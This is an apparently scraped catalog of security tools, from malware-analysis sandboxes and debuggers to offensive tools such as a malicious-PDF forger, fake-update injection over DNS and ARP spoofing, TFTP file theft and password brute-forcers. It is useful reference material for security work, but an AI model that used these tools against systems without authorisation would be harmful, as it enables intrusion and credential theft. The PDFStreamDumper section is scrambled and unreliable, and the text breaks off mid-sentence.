http://r3stricted.com/book/export/html/16 Tools Catalog Analysis Artemisa http://sourceforge.

net/projects/artemisa/ Artemisa is an open source VoIP/SIP-specific honeypot software designed to conne ct to a VoIP enterprise domain as a user-agent backend in order to detect malici ous activity at an early stage. Moreover, the honeypot can play a role in the re al-time adjustment of the security policies of the enterprise domain where it is deployed. Artemisa should work as a conventional user-agent of a VoIP/SIP domain. To achie ve this, it provides modular configuration files where the administrator can set up the connection parameters as well as the Artemisa's behavior. The SIP registrar server of the domain should be also configured in order to let Artemisa be registered with a set of extensions (e.g. 5 extensions from 401 to 405). Once Artemisa is configured and launched, which is suggested to do it on a separate machine or virtual machine, it keeps listening and waiting for SIP act ivity. Normally, it's expected NOT to see SIP activity on the honeypot, such as a call, since the honeypot doesn't represent a human being. Thus, any call or me ssage which reach the honeypot is suspicious and is analyzed. The analysis involves the usage of different techniques and third-party tools to determine and classify the nature of the message. When the message is classifie d and a conclusion is obtained, Artemisa reports that in several ways such as ru nning user-configurable scrits and sending an e-mail report. The user-configurab le scripts allow the administrator to give Artemisa the enough power to adjust t he domain policies in real-time. Cuckoo http://www.cuckoobox.org/ Cuckoo is a lightweight solution that performs automated dynamic analysis of pro vided Windows binaries. It is able to return comprehensive reports on key API ca lls and network activity. Current features are: * * * * * * * * Retrieve files from remote URLs and analyze them. Trace relevant API calls for behavioral analysis. Recursively monitor newly spawned processes. Dump generated network traffic. Run concurrent analysis on multiple machines. Support custom analysis package based on AutoIt3 scripting. Intercept downloaded and deleted files. Take screenshots during runtime.

DNS Sinkhole http://isc.sans.edu/diary.html?storyid=9037 A sinkhole is defined like a process in which we redirect specific IP network ta rgeted visitors for a variety of security factors just like analysis, diversion of attacks and detection of anomalous activities. It has extended been deployed by Tier-1 ISP’s globally commonly to protect their downstream customers. how ever for ones network administrators, sinkholes are commonly deployed to offer valuab le intelligence relating to the security threats their networks are facing. Read on below for additional facts on sinkholes as well as the a couple of sorts of

sinkhole implementation — darknets and honeynets and how you possibly can use them for getting valuable facts relating to threats and misconfigurations within you r network. DOMScan http://blueinfy.com/tools.html DOMScan is utility to drive IE and capture real time DOM from the browser. It gi ves access to active DOM context along with JavaScripts. One can observe the DOM in detail using this utility. It has predefined rules to scan DOM. One can run the scan on existing DOM and fetch interesting entry points and calls. It allows tracing through JavaScript variables as well. Using this utility one can identi fy following vulnerabilities. • • • • • • • DOM based XSS DOM based vulnerable calls Source of abuse and external content loading methods Possible DOM logic and business layer calls Same Origin Bypass calls and usage Mashup usage inside DOM Widget Architecture review using the tool

DOMTracer http://blueinfy.com/tools.html DOMTracer - Firefox Plugin (Trace DOM and JavaScript Calls) # The DOM as seen in all the aforementioned cases needs to be analyzed in many a spects. Run-time analysis of the DOM/JavaScript is vital and aids one to look at the calls made during the ‘dynamic DOM manipulation’. The DOMTracer is a Firefox Ex tension for this same purpose. It has been written using the standard method of writing extensions using the XUL platform and the JavaScript language in majorit y. This is in beta and we are working on new features. DarunGrim http://www.darungrim.org/ DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provi des binary diffing functionality. Binary diffing is a powerful technique to reverse-engineer patches released by s oftware vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that infor mation to learn what causes software break. Also that information can help you w rite some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers. This binary diffing technique is especially useful for Microsoft binaries. Not l ike other vendors they are releasing patch regularly and the patched vulnerabili ties are relatively concentrated in small areas in the code. That makes the patc hed part more visible and apparent to the patch analyzers. There is a "eEye Bina ry Diffing Suites" released back in 2006 and it's widely used by security resear chers to identify vulnerabilities. Even though it's free and opensource, it's po werful enough to be used for that vulnerabilities hunting purpose. Now I'm relea sing DarunGrim2 which is a C++ port of original python codes. DarunGrim2 is way faster than original DarunGrim. Faster Universal Unpacker http://code.google.com/p/fuu/ FUU (Faster Universal Unpacker) is a GUI Windows Tool with a set of tools (plugi

ns) to help you to unpack, decompress and decrypt most of the programs packed, c ompressed or encrypted with the very well knowns software protection programs li ke UPX, ASPack, FSG, ACProtect, etc. The GUI was designed using RadASM and MASM. Every plugin included in the officia l release was written in ASM using MASM. The core of every plugin use TitanEngine SDK from ReversingLabs under the hood, this help to the developer to write plugins very easy and very fast without the need to worry about some repetitive and boring functions like dump, fix the iat, add sections, etc. You can develop a plugin for FUU in a very easy way using Ti tanEngine. Also, FUU include some extra tools like: * * * * Generic OEP Finder Cryto Signature Detector Generic Unpacker Signatures Detector (next release)

FileFormats Origami http://security-labs.org/origami/ origami is a Ruby framework designed to parse, analyze, and forge PDF documents. This is NOT a PDF rendering library. It aims at providing a scripting tool to g enerate and analyze malicious PDF files. As well, it can be used to create on-th e-fly customized PDFs, or to inject (evil) code into already existing documents. Features * Create PDF documents from scratch. * Parse existing documents, modify them and recompile them. * Explore documents at the object level, going deep into the document structure, uncompressing PDF object streams and desobfuscating names and strings. * High-level operations, such as encryption/decryption, signature, file attachme nts... * A GTK interface to quickly browse into the document contents. PDFStreamDumper http://sandsprite.com/blogs/index.php?uid=7&pid=57 PDF Stream Dumper is a free tool that aids in the analysis of malicious PDF docu ments. It also has some features that can make it useful for PDF vulnerability d evelopment. Specialized tools that deal with obfuscated JavaScript code, low lev el PDF header and object reader are available. In terms of shellcode analysis, i t has an integrated interface for libemu sctest, an updated build of iDefense sc log, and a shellcode_2_exe feature. JavaScript tools include integration with JS -Beautifier for code formatting, the ability to run portions of the script live for live de-obfuscation, as well as a pretty stable refactoring engine that will parse a script and replace all the screwy random function and variable names wi th logical sanitized versions for readability are also available. Full feature list * , * o Supported filters: FlateDecode, RunLengthDecode, ASCIIHEXDecode, ASCII85Decode LZWDecode Integrated shellcode tools: sclog gui (Shellcode Analysis tool)

Malicious Office File Detection Read http://evilcodecave.vbs – recursivly scans parent dir for pdfs that use multiple encod ing filters on a stream. duplicate streams.) via plugins and adds automation features via various VBS scri pts. Bug Fix.com/Evilcry/PythonScripts PyOLEScanner . a s well as being able to decode filter chains (multiple filters applied to the sa me stream object.vbs – uses pdfbox to extract page data into ind ividual files PyOLEScanner https://github. header.vbs – use pdfbox to extract all images and text from current file * string_scan. .0 Basic JavaScript de-obsfuscator Can hide: header only streams. selected streams JS UI also has access to a toolbox class to simplify fragmented strings read/write files do hexdumps do unicode safe unescapes disassembler engine replicate some common Adobe API (new) PDF Stream Dumper also supports unescaping/formatting manipulated PDF headers..o o o * * * * * * * * * * * * * * * * * * o o o o o o scdbg libemu based Shellcode analysis tool Shellcode_2_Exe functionality Export unescaped bytes to file Supports filter chaining (ie multiple filters applied to same stream) Supports unescaping encoded pdf headers Scriptable interface to process multiple files and generate reports View all pdf objects View deflated streams View stream details such as file offsets..blogspot. etc Save raw and deflated data Search streams for strings Scan for functions which contain pdf exploits (dumb scan) Format javascript using js beautifier (see credits in readme) View streams as hex dumps Zlib compress/decompress arbitrary files Replace/update pdf streams with your own data Basic JavaScript interface so you can run parts of embedded scripts PdfDecryptor w/source – uses iTextSharp and requires .vbs – scan a directory and build list of all pdfs which have unsupported filters * filter_chains. for more background info Version 1.com/2010/08/malicious-office-files-analysis.Net Framework 2.vbs – scan all decompressed streams in all files in a directory for a string you enter * unsupported_filters.Builds csv file with results from lower status bar for all fil es in a directory * pdfbox_extract.3 contains: 1. * obsfuscated_headers. Current Automation scripts include: * csv_stats.vbs .vbs – recursivly scans parent dir for pdfs that have obsfusc ated object headers * pdfbox_extract_text_page_by_page.

8 * * * * * -L operator does vim friendly line numbers Man pages and documentation updates PHP signature updates JSP signature updates Dotnet signature updates .justanotherhacker. TTF and SWF. Graudit http://www.com/projects/graudit/download. Flar e may suit your needs. OLE2 Macro Scan. Flasm then applies your changes to the o riginal SWF. although swfmill can be used to produce both simple and complex S WF structures.py _suspect_document Compatibility with Windows and Linux is mantained. Looki ng at disassembly. However. SWAAT and flaw-finder. replacing original actions.2.html Flasm disassembles your entire SWF including all the timelines and events. in presence of encryption a 'decrypted' copy. * built around an XSLT/EXSLT processor (libxslt) * input and output of the XSLT transformation can be either XML or binary SWF * XSLT commands for importing PNG. 4. What you get is the human readable representation of SWF bytecodes. Directory scan works too. and for mapping SWF ID num bers * built-in "simple dialect" to support library creation and building simple SWFs swfmill was originally written by Daniel Turing. fonts (TTF) or other SWF movies for use with MTASC. you learn how the Flash compiler works. It includes substantial contributions by Ralf Fuest.html Graudit is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility grep. 6. More API Detection. More Shellcode Detection. flasm http://www. which improves your A ctionScript skills. not ActionScript source. JPEG. 5. 3. Flasm is not a decompiler. Flare can't alter the SWF.de/flasm. If you're looking for a decompiler.org/ It's most common use is the generation of asset libraries containing images (PNG and JPEG). making optimizin g of large projects more comfortable. Steve Webster and others. swfmill http://www. USAGE: python pyOLEScanner. Version 1. SQLite Support. but is now maintained by Daniel Cassidy. Office2007 (docx/pptx/xlsx) deflate and Macro checks. It’s comparable to other static analysis applications like RATS.swfmill. You can also do some optimizations on the disassembled code by hand or adjust the code as you wish. It's also possible to embed Flasm actions in your ActionScript.or haXe-compiled ActionScript.nowrap.

Key features of IEZoneAnalyzer: * View effective security zone settings for any security zone on the local compu ter or exported from a remote computer and identify whether each setting was est ablished by policy. adding a tremend ous amount of new functionality compared to earlier versions..com/products-immdbg. It also does not have an installe r – just run the utility directly. It builds on a solid user interface with function graphing.html The aim of the INetSim project is to perform a quick run-time analysis of the ne twork behavior of unknown malware samples in a laboratory environment. . to determine whether a system has drifted fr om its baseline settings). Note that IEZoneAn alyzer does not require administrative rights.technet. INetSim http://www. and reverse engineer binary files. * Filter comparison results to show only differences or conflicts.immunityinc. * Compare settings between two or more security zones or templates.inetsim.5.NET Framework 3. analyze malware. IEZoneAnalyzer does require.org/index. and a large and well supported Python API for easy extensibility. * Sort.* * * * * Perl signature updates and bug fixes Python signature updates Bug fixes for aux/ scripts More aux/ scripts Fixed ignore CVS directories by default IEZoneAnalyzer http://blogs. on which the standard security settings dialog does not allow viewing of settings.aspx IEZoneAnalyzer is a utility for viewing and comparing Internet Explorer security zone settings.shtml Immunity Debugger is a powerful new way to write exploits. the industry's first heap analysis tool built specifically for heap c reation. IEZoneAnalyzer version 3 represents a total rewrite. reorder and resize result columns. * View and compare entire sets of settings captured on different computers or on a single computer over time (e. * Copy selected or all results to the clipboard. It is particularly valuable on systems controlled through Group Policy. Modules for the simulation of the following services are included: * * * * * * * * * * * * HTTP / HTTPS SMTP / SMTPS POP3 / POP3S DNS FTP / FTPS TFTP IRC NTP Ident Finger Syslog Dummy.com/b/fdcc/archive/2011/04/14/iezoneanalyzer-v3. * Export results to Excel or to a Comma Separated Values (CSV) text file. Immunity Debugger http://www.g.

In more technical terms. understandable interfaces -Robust and powerful scripting language for automating intelligent debugging -Lightweight and fast debugging to prevent corruption during complex analysis -Connectivity to fuzzers and exploit development tools Mallory http://intrepidusgroup.woany. The victim network then use s the Mallory gateway to route traffic. The application loads the scan data from nessus and nmap XML. does some data cle ansing.uk/networkscanviewer/ NetworkScanViewer is a GUI application designed to help view the results of ness us (v4) and nmap (v5) scan results. or ma ybe just pull a prank on your friend. The list data can be sort ed by clicking on the column headers.com/insight/mallory/ Mallory is a transparent TCP and UDP proxy. It is also possible to permanently exclude scripts that just generate nois . so if you change the sort order or filter the results. service etc so it is easy to drill down to specific information. then it is reflected in the ex port. NetworkScanViewer http://www. It can be used to get at those hard to intercept network streams. The goal is to man in the middle traffic for testing purposes. Folder Structure * * * * * * ca – certificate authority files including Mallory’s private key certs – MiTM certs that are created on the fly db – directory where mallory stores all database files mallory – empty directory src – where the code lives scripts – scripts used to configure mallory enviorment MiniFuzz File Fuzzer http://www. It combines the functionality of both Nessus Viewer and NmapViewer. Mallory is an extensible TCP/UDP man in the middle prox y that is designed to be run as a gateway. The export functionality exports using the data shown in the results list. port. then displays the results on the results list. The gateway machine will have at least one WAN interface that grants Internet access.microsoft. There is also the ability to filter on specific information like host. The ideal setup f or Mallory is to have a “LAN” or “Victim” network that Mallory acts as the gateway for.co.com/downloads/en/details. The victim virtual machines then configures the Mallory machine a s the gateway by manually setting its gateway.-A debugger with functionality designed specifically for the security industry -Cuts exploit development time by 50% -Simple.aspx?FamilyID=B2307CA4-638F-4641-9 946-DC0A5ABE8513&%3bdisplaylang=en&pf=true MiniFuzz is a basic testing tool designed to help detect code flaws that may exp ose security vulnerabilities in file-handling code. This can be configured within a virtal machine environment using host only netwo rk interfaces. so it is easy to order and locate particul ar information. This tool creates multiple r andom variations of file content and feeds it to the application to exercise the code in an attempt to expose unexpected and potentially insecure application be haviors. assess those tricky mobile web applications.

com/products/TitanEngine. Features * * * * * Data cleansing Export to CSV and XML Sortable data columns Data Filtering Script excluding ProcNetMonitor http://securityxploded. SQLInject Finder http://code. It has advanced color based auto analysis sy stem to make it easy to distinguish network oriented processes from others with just one glance at the list. The output includes: * The suspicious IP address * The attacked webpage * The parameter and value used * The frame number of the packet within the pcap (can be used to find exactly wh ere the packet is in Wireshark) * The reason why the request was flagged TitanEngine http://www.com/p/sqlinject-finder/ Brief Description¶ Simple python script that parses through a pcap and looks at the GET and POST re quest data for suspicious and possible SQL injects. it is becoming imperative for reverse engineers to test for ma lwares in the time made available to them.google. As malwares get equiped with newer techniques. The only thing standing between a ’clean’ machine a nd malware is a reverse engineer/malware analyser. It also presents unique 'Port Finder' feature to easily search for particular po rt in all running processes with just one click.reversinglabs. Rules to check for SQL injec tion can be easily added. Tools like TitanEngine will surely he lp us in our malware analysis & reverse engineering endeavours! It is one of the tools that we have been waiting for download since the time it was announced at the BlackHat 09! TitanEngine is a an OPEN SOURCE framework from the Reversing Labs that can be us ed to perform over 250 functions! Best of all. It can also be used to make new tools that work with PE files! Both – 32 bit & 64 bit formats are supported! It can be used to create all known types of unpack . It displays all open network ports (TCP/UDP) and active ne twork connections for each process. Output can be printed neatly on the command line or in tab delimited format.e by right clicking on the item and selecting "Ignore Plugin" from the context m enu.php ProcNetMonitor is the free tool to monitor the network activity of all running p rocess in the system. Excluded scripts can be re-added at any time by using the Options window.php With time. you can have all of that automate d. malware authors are becoming cleverer and are successfully finding wa ys of evading security software.com/procnetmonitor. It also comes with export featu re to save the entire process-port list to standard HTML file for offline analys is.

… Tuluka kernel inspector http://www.ers. Reverse Engineering by Crayon Slides from the Blackhat talk.net/?q=node/1379 WinAPIOverride32 ..gatech.edu/ http://www. which has the following features: * Detects hidden processes.tuluka. Ether: Malware Analysis via Hardware Virtualization Extensions http://ether.offensivecomputing. drivers and devices * Detects IRP hooks * Identifies the substitution of certain fields in DRIVER_OBJECT structure * Checks driver signatures * Detects and restores SSDT hooks * Detects suspicious descriptors in GDT * IDT hook detection * SYSENTER hook detection * Displays list of system threads and allows you to suspend them * IAT and Inline hook detection * Shows the actual values of the debug registers.org/index.. Resources. start rout ines of system threads and many more * Allows to build the stack for selected device * Much more. the reverse engineering visualization program based off the Ether Project.offensivecomputing.gtisc. It’s features are: * * * * * * * * * * * * * SDK has 250 documented functions Easy automation of all reversing tools Supports both x86 and x64 Can create: Static. Displays the above stated information in GUI for user to see and probably make u se of those information for analysis Vera http://www. Dynamic & Generic unpackers Tested on over 150 unpackers Its free and open source–LGPL3! Integrated x86/x64 debugger Integrated x86/x64 disassembler Integrated memory dumper Integrated import tracer & fixer Integrated relocation fixer Integrated file realigner Functions to work with TLS.net/bhusa2009/oc-reversing-by-crayon-bhusa.offensivecomputing.html uluka is a new powerful tool (antirootkit). http://www.. Exports. even if reading these register s is controlled by someone * Allows you to find the system module by the address within this module * Allows you to display contents of kernel memory and save it to disk * Allows you to dump kernel drivers and main modules of all processes * Allows you to terminate any process * Is able to dissasemble interrupt and IRP handlers.net/?q=node/1316 VERA. system services.

struct and union) and user defines are supported * All is is done like modules : you can log or override independently for any fu nction * Open Source * A library is provided for developpers who intend to build their one hooking so ftware WinAPIOverride32 tries to fill the gap between classical API monitoring software s and debuggers.cs.com/p/yara-project/ YARA is a tool aimed at helping malware researchers to identify and classify mal ware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families.berkeley. Hence you will need to download the toolkits to get the System State Analyzer tool.http://jacquelin.fr/winapioverride32/ WinAPIOverride32 is an open source and advanced api monitoring software for Wind ows operating systems. Yara http://code.potier.google.com/fwlink/?LinkID=140110 http://go. Windows System State Analyzer http://go. A few of WinAPIOverride32′s functions are: * You can define filters on parameters or function result * You can define filters on dll to discard calls from windows system dll * You can hook functions inside the target process not only API * You can hook asm functions with parameters passed through registers * You can hook hardware and software exceptions * Double and float results are logged * You can easily override any API or any process internal function * You can break process before or/and after function call to change memory or re gisters * You can call functions which are inside the remote processes * Can hook COM OLE and ActiveX interfaces * User types (enum. wri tten in C++. You can use it to monitor and/or override any function of a process! You can do it for API functions or executable internal functions.edu/ Binary analysis is imperative for protecting COTS (common off-the-shelf) program . You can also “break” a targeted application before or after a funct ion call.microsoft. Each descrip tion consists of a set of strings and a Boolean expression which determines its logic bitblaze http://bitblaze.microsoft. This is a wonderful open source application.com/fwlink/?Li nkID=140109 The basic functionality of the System State Analyzer tool is to allow you to com pare two snapshots taken at different points in time. allowing memory or registers changes. and it can directly call functio ns of the targeted application. Th is can be specially helpful when you are dealing with malwares or trying to reve rse engineer certain applications. This allows you to compare the state of a machine both before and after an application install or probably you could use it in your VM as a first step in malware analysis or reverse engi neering This tool is a part of the Windows 2008 R2 Logo Software Certification and Windo ws 2008 R2 Logo Program Software Certification toolkits.free.

not source code. to ggle garbage collection. r andom shuffling and recursion fanout control are used to ensure good coverage. However. but use references collected from the first document for overwriting properties and calling methods in the second one. a secondary blacklist is use d to prevent navigating away or descending into the master window. Thus. Randomly destroy document windows. Randomly destroy first document using one of the several possible methods. as well as malicious binaries. XHTML . possibly plugin-supported formats could be targeted instead. dirtyJOE . binary analysis is challenging due to the lack of higher-level semantics.com/2011/01/announcing-crossfuzz-potential-0-day. collecting encountered object refe rences for later reuse. Also. 2. 5.s and analyzing and defending against the myriad of malicious code. with some probability. Perform the same set of crawl & tweak operations for the second document. carry over a percentage of collected refer ences to the next fuzzing cycle. can be used for analyzing COTS software.. The BitBlaze project also strives to open new applicat ion areas of binary analysis.blogspot. binary analys is provides the ground truth about program behavior since computers execute bina ries (executables). 3. 7. and creating circular node references that stre ss-test garbage collection mechanisms. 6. If a method returns an object. where source code is unavailable. and develop defense s against malicious code. Detailed cross_fuzz fuzzing algorithm: 1. Many higher level techniques are often i nadequate for analyzing even benign binaries. Crawl DOM hierarchy of the first document.although any o ther. and SVG documents are randomly selected as targets by default . cross_fuzz http://lcamtuf. Repeat DOM crawl. inspecting return ed objects. understand.coredump. which provides sound and effective solutions to ap plications beyond software security and malicious code defense. as noted above. Visited objects and collected references are tagged usin g an injected property to avoid infinite recursion. to one of a handful of hardcoded "interesting" values). The fuzzer owes much of its efficiency to dynamically generating extremely longwinding sequences of DOM operations across multiple documents. Simple HTML. randomly tweaking encountered object properties by setting them to a one of the previously recorded references (or.cx/cross_fuzz http://lcamtuf. 4. we need to develop tools and techniques which work at the binary l evel. Call parameter s are synthesized using collected references and "interesting" values. let alone potentially malicious bi naries. The BitBlaze project aims to design and develop a powerful binary analysis platf orm and employ the platform in order to (1) analyze and develop novel COTS prote ction and diagnostic mechanisms and (2) analyze. Open two windows with documents of any (DOM-enabled) type. randomly calling encountered object methods.. and the binary may even be obfuscated. such as protocol reverse engineering and fingerprint generation. recursing into them. its output is subsequently crawled and twe aked in a similar manner. Repeat DOM crawl. Critically.

javasnoop http://code.The database can be found in the fl0p. HTTPS. like the DOS Header. you can a lso possibly check for the site that the client has requested for. MacOS X. It displays detailed header s of PE with all its section details. How does it attach to an existing process? It installs stageloading “hooks” wi th the Java Instrumentation API and by working with some bytecodes.fp file. PE File Header. file header fl0p http://lcamtuf.Java Overall Editor is a complex editor and viewer for compiled java binaries (. you can decipher the IP addresses of the two hosts taking part in the communication. IRC Commands. But. You can go on looking at the output and learn about the network. This being the reason.coredump. It does so.com/p/malwareanalyzer/ It can be useful for string based analysis for Windows registry.com/p/javasnoop/ JavaSnoop is a tool that lets you intercept methods. Ima . dirtyJOE is free for non-commercial use. This is why having a good database is important.class files).com/tools/javasnoop/ malwareanalyzer http://code. but just by matching the result. Michal Zalewski. Current version still has some limitations. DOS Stub. or just watch what’s happening on the sy stem. You su re can add and improve upon the database with your inputs. *BSD. fields. It can also gene rate various section of a PE. fl0p is a simple flow-analyzing passive L7 fingerprinter. API calls.aspectsecurity. not by sniffing. Main features: * Viewer for: constant pool. attributes * Editor for: constant pool. it is supported on many systems – Linux. This can be an interesting if you have lots of time to pre-plan your attack. The result is then match ed with a database of traffic pattern signatures to deduce its observations. It can also perform an full ASCII dump of the PE along with other options. no third party libraries were used. bytecode. DLL’s called and anit-VMWare code detection. are compl etely safe from monitoring. and Cygwin. AI X. http://www. It passively examines the sequence of client-server exchanges inside your network with their their rel ative layer 7 payload sizes and transmission intervals.http://dirty-joe.com/ dirtyJOE .cx/fl0p-devel. by allowing yo u to attach it to an existing process (like a debugger) and instantly begin tamp ering with method calls. methods. It does so. It has been loosely based on another wonderful tool – p0f and has been coded in C. From the output that the tool displays. fl0p will prove you wrong. run custom code.tgz This tool was released way back in the year 2006 by Mr. FTPS.google.google. import and export symbols etc. alter data and otherwise te st the security of Java applications on your desktop. but hopeful ly those will be removed within the next releases. In case of HTTPS traffic. It is p opularly believed that secure protocols such as SSH. etc. dirtyJOE is entirely written in C++.

In a nutshell it allows you to take a object in memory back to source code.org/ tcpdump is a common computer network debugging tool that runs under the command line. Presentation from blackhat here: http://prezi. Based on PeID signa tures. pyREtic http://code. etc. with out needing access to the bytecode directly on disk. Data Directories.rootkitanalytics. portable application which does not require any installation. StreamArmor comes wit h fast multi threaded ADS scanner which can recursively scan over entire system and quickly uncover all hidden streams. It can b e copied to any place in the system and executed directly.sourceforge. This can be useful if the a pplictions pyc's on disk are obfuscated in one of many ways. It also provides a tracer functionality that can be used to identify anti-debugging calls tricks. tcpdump http://www. vusb-analyzer http://vusb-analyzer.at/downloads/software/minibis_en. Section Table.com/tools/streamarmor. Sections. keyboard hooks. DEP setting change s. This makes it g reat tool in forensic analysis in uncovering hidden documents/images/audio/video /database/archive files within the alternate data streams. StreamArmor is the st andalone.net/ .php StreamArmor is the sophisticated tool for discovering hidden alternate data stre ams (ADS) as well as clean them completely from the system. minibis http://cert. it can also detect packers used to compress the file.ge Optional Header.com/kmyvgiobsl1d/pyretic-rich-smit h-blackhatdefcon-2010/ streamarmor http://www.com.google.com/p/pyretic/ pyREtic and the REpdb debugger allow easier access to obtaining source from clos ed source Python applications.at. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. etc. Malware anal yzer will also help you with code analysis and disassembling the malware.tcpdump. Fu rther a special focus lies in handling a huge amount of malware samples and the actual implementation at CERT. It can also perform an online malware check at www.html Build up a customizable automated malware analysis station by using only freely available components with the exception of the target OS (Windows XP) itself. StreamArmor has built-in advanced file type detection mechanism which examines t he content of file to accurately detect the file type of stream. As primary goal the reader of this paper shoul d be able to build up her own specific installation and configuration while bein g free in her decision which components to use. It's advanced auto a nalysis coupled with online threat verification mechanism makes it the best tool available in the market for eradicating the evil streams. f ile system manipulation calls. rootkit hooks.virustotal. All such discovered streams are represen ted using specific color patten based on threat level which makes it easy for hu man eye to distinguish between suspicious and normal streams.

Process Hacker detects processes hid den by simple rootkits such as Hacker Defender and FU. As a res ult. We wanted a tool that made it easy to see problems at a glan ce. avast! anti-virus.The HTTP communication b etween such client and server is harder to intercept and test. AVG Antivirus.. suitable for use with wireshark. virtual memory map. re sume and delete). environment variables. (just t o name a few).The Virtual USB Analyzer is a free and open source tool for visualizing logs of USB packets.. handles. # Find hidden processes and terminate them. We'll describe here how to activate this feature. etc. including software like Ic eSword. customizable tree view with highlighting showing you the processes run ning on your computer. from hardware or software USB sniffer tools. we ended up with what we think is a fairly unique tool. Attacking Applications Process Hacker http://processhacker.html During Penetration testing it can be seen that thick-clients sometimes communica te with a server whose IP address is hardcoded in to it. token information. # Full control over all processes. even processes protected by rootkits or secur ity software.andlabs.. suspend and resume all processes and threads.. COMODO Internet Security.. pause.php?post/2011/04/06/Sniffing-U. We developed vusb-analyzer at VMware as an efficient way to debug our own USB vi rtualization stack. VMWare offers the possibility to dump any usb traffic at the lowest level to a d ump file.simply right-click a process and select "In ject DLL" to inject and right-click a module and select "Unload" to unload! # Many more features. Sniff-n-Spit http://www. but it's d esigned to be easily extensible. # Detailed performance graphs. It currently supports three log formats. A simple. it' s the world's first tool to provide a graphical visualization along with raw hex dumps and high-level protocol analysis. you c an add support for your favorite log format. It is just a user int erface for visualizing logs. and we wanted a way to solve both correctness and performance bugs. under the M IT license. Sniff-n-Snip is a very useful utility in such scenarios. . Its kernel-mode driver has unique abilities which allows it to ter minate. and additionally pub lish a script to convert the dump file to the PCAP format. thread listing and stacks with dbghelp symbols.sogeti. # Easy DLL injection and unloading ..net/ Process Hacker is a feature-packed tool for manipulating processes and services on your computer. module and m apped file information. # A list of network connections. We're excited to ha ve the opportunity now to release this tool as open source software.org/tools. As far as we know.com/dotclear/index.sourceforge. stop. # A complete list of services and full control over them (start. The Virtual USB Analyzer is not itself a USB sniffer tool. # Comprehensive information for all processes: full process performance history. http://esec-lab. With a couple dozen lines of Python code. It sniffs for HTTP packets from the clie .

300 Vidbox 7. Destination IP. The original l will download an update as if it was downloaded from the main site instead your internal update server! As of now. TFTP Theft http://code.30. It can do so.0 Istat.py .0.409 upd too of mod . It is a tool which allows one to quickly scan/bruteforce a TFTP server for files and download them instantly. and that is all. So.google.5.py. the tool requires this library for sniffing packets. * Source IP. Paros et c). because TFTP. thief. Requirements: * WinPcap should be installed on the system.looks for tftp servers on a target ip address range TFTPTheft is a collection of two scripts – one for downloading files from discover ed targets and the other for discovering the targets.0.downloads files based on a pattern or list of files finder. you could consider this pretty compl ete.1. Typically values will be 1 27.1. the Trivial FTP p rotocol still suffers from a major drawback – no authentication.nt to server and forwards them to your favorite proxy (Burp. 8080. WebScarab.com.2. ISR-Evilgrade supports the following ules: * * * * * * * * * * Freerip 3.1.1130 Fcleaner 1.infobyte. and Destination Port of the tcp session that is to be sniffed * Target IP and Target Port of the Interceptor Proxy. What you can do is let ISR-Evilgrade know that some one is requesting for an ate.py and finder. This number can be found using the "-l" swi tch.7. The rest will be done by the tool itself.5015 Atube catcher 1. Gom 2.0. * The tool can be forced to listen on promiscuous mode with the "-p" switch. isr evilgrade http://www.2 Teamviewer 5. Source Port (optional).5 Ccleaner 2. Thi s is OFF by default.html It's is a modular framework that allow us to take advantage of poor upgrade impl ementations by injecting fake updates.ar/developments.30 Jet photo 4.9385 ISOpen 4.py . User Input: The tool expects the following user input: * Number of the listening interface.25. The names of these two Pyt hon scripts are – thief.9.com/p/tftptheft/ TFTP Theft is a tool which allows one to quickly scan/bruteforce a tftp server f or files and download them instantly.

9 * AutoIt Script 3.18702.0.8 * Winamp 5. <= Itunes 10.Internal DNS access .10 (Sparkle Framework) * VMware Attack vectors: -------------Internal scenary: .96.0.0.18.98.com) * Google Analytics Javascript injection * Speedbit Optimizer 3.5.DNS Cache Poisoning spiderpig http://code.4.DHCP spoofing External scenary: .3.45 * Cpan 1.116 ( Safari 5.8 ) * Express talk * Filezilla * Flashget * Miranda * Orbit * Photoscape.3 * Winscp 4.9402 * VirtualBox (3.14 * Windows update (ie6 lastversion.google.581 * TechTracker (cnet) 1.0.* Allmynotes 1.971) * Blackberry Facebook 1.5730. ie7 7.1 * Clamwin 0.DNS Cache Poisoning .2 * Java 1.1.when we open pd f in reader.22 | Twitter 1.spell checking.0_22 winxp/win7 * aMSN 0.1 (Build 55) * Nokiasoftware firmware update 2.6.0.3 * Appleupdate <= 2. ie8 8.2.26 * Notepad++ 5.2 7533.04 LTS) * Ubertwitter 4.0.11 (Iphone/Itunes) * getjar (facebook.0.0.0.1034 * Apt ( < Ubuntu 10.3..1.printing n viewing etc. Microso ft works) * Dap 9.it executes this javascript code(ya we all know that).1.22.011 * BSplayer 2.8 1675) * Mirc 7.0.60001.6.2.6 (0.8.3.53.1. so goal of sp .8es (Windows software) * Nokia firmware v20.0.1 * AppTapp Installer 3.0 / Video Acceleration 2.26 * Adium 1. <= Qui cktime 7.7.Internal DNS access .6.com/p/spiderpig-pdffuzzer/ Adobe and others uses javascript in pdfs to enhance standard workflow for exampl e connecting to database .5.2.2. * Panda Antirootkit * Skype * Sunbelt * Superantispyware * Trillian <= 5.ARP spoofing .13.

spiderpig reads metho ds prototype from an input file and creates pdf file. Target information (host/user/password) can be specified in a variety of ways. The goal is to support as many services which allow remote authentication as possible.html Medusa is intended to be a speedy. login brute-forc er.oxid. For example. modular.html Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allo ws easy recovery of various kind of passwords by sniffing the network.so here we have spiderpig a javascript fuzzer for pdf f ile format which tries to screw up pdf reader using javascript methods. cracking encrypted passwords using Dictionary. Brute-Force and Cryptanalysis attacks.it/cain. recovering wireless net work keys. KrbGuess http://www. Ncrack http://nmap.net/projects/worawita/ Bruter is a parallel network login brute-forcer on Win32. rec ording VoIP conversations. revealing password boxes. Each service module exists as an independent . It allows you to do this by studying the response from a TGT request to the KDC server.I didnt find one fuzzer which fuzzes adobe's ja vascript imeplementaiton.iderpig is to find bugs in pdf reader's javascript engine. decoding scrambled passwords. MIT and Heimdal Kerberos implementations. users or passwords concurrently. Additionally. This m eans that no modifications are necessary to the core application in order to ext end the supported list of services for brute-forcing.net/jmk/medusa/medusa. massively parallel. Most of the pdf fuzzers wh ich are available on internet are file format fuzzers which tries to fuzz the ad obe's file format implementation.foofus. The tool works ag ainst both Microsoft Active Directory.org/ncrack/ Ncrack is a high-speed network authentication cracking 